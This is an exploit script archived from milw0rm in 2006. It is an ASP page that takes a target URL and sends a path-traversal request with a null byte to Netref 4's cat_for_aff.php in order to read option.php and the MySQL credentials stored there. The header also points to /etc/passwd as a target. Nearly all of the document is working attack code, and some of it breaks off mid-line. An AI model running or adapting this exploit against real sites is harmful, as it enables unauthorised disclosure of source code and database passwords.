Netref 4 (cat_for_aff.php) Source Code Disclosure

<% Response.Buffer = True %> <% On Error Resume Next %> <% Server.ScriptTimeout = 100 %> <% '=============================================================================================== ' =>option.php Reader '[Script Name: Netref 4 (cat_for_aff.php) Source Code Disclosure '[Coded by : ajann '[Author : ajann '[Contact : :( '[ExploitName: exploit4.asp '[Note : exploit file name =>exploit4.asp '[Note : http://[target]/[path]/script/cat_for_aff.php?ad_direct=../etc/passwd |etc... '[Using : Write Target after Submit Click '=============================================================================================== %> <% function guvenlik(username) guvenlik = Replace(username," // Adresse du serveur MySQL","") guvenlik = Replace(guvenlik," // Nom d'utilisateur de la base MySQL ","") guvenlik = Replace(guvenlik," // Nom d'utilisateur MySQL","") guvenlik = Replace(guvenlik," //Mot de passe MySQL","") guvenlik = Replace(guvenlik," // Nom de la base MySQL","") guvenlik = Replace(guvenlik," // Nom d'utilisateur de la base","") guvenlik = Replace(guvenlik," MySQL","") End Function %> Netref 4 (cat_for_aff.php) Source Code Disclosure Netref v4 (cat_for_aff.php) Source Code Disclosure

TARGET:Example:[http://x.com/path]

<% islem = Request.QueryString("islem") If islem = "hata1" Then Response.Write "There is a problem! Please complete to the whole spaces" End If If islem = "hata2" Then Response.Write "There is a problem! Please right character use" End If If islem = "hata3" Then Response.Write "There is a problem! Add ""http://""" End If %> <% If islem = "get" Then string1="/script" string2="/cat_for_aff.php?" string3="ad_direct=." string4="./option" string5=".php%0" string6="0" targettext = Request.Form("text1") arama=InStr(1, targettext, "union" ,1) arama2=InStr(1, targettext, "http://" ,1) If targettext="" Then Response.Redirect("exploit4.asp?islem=hata1") Else If arama>0 then Response.Redirect("exploit4.asp?islem=hata2") Else If arama2=0 then Response.Redirect("exploit4.asp?islem=hata3") Else %> <% target1 = targettext+string1+string2+string3+string4+string5+string6 Public Function take(come) Set objtake = Server.CreateObject("Microsoft.XMLHTTP" ) With objtake .Open "GET" , come, FALSE .sEnd take = .Responsetext End With SET objtake = Nothing End Function get_username = take(target1) getdata=InStr(get_username," ajann

Data:

<%=guvenlik(username)%>

<% End If End If End If End If Set objtake = Nothing %> # milw0rm.com [2006-10-29]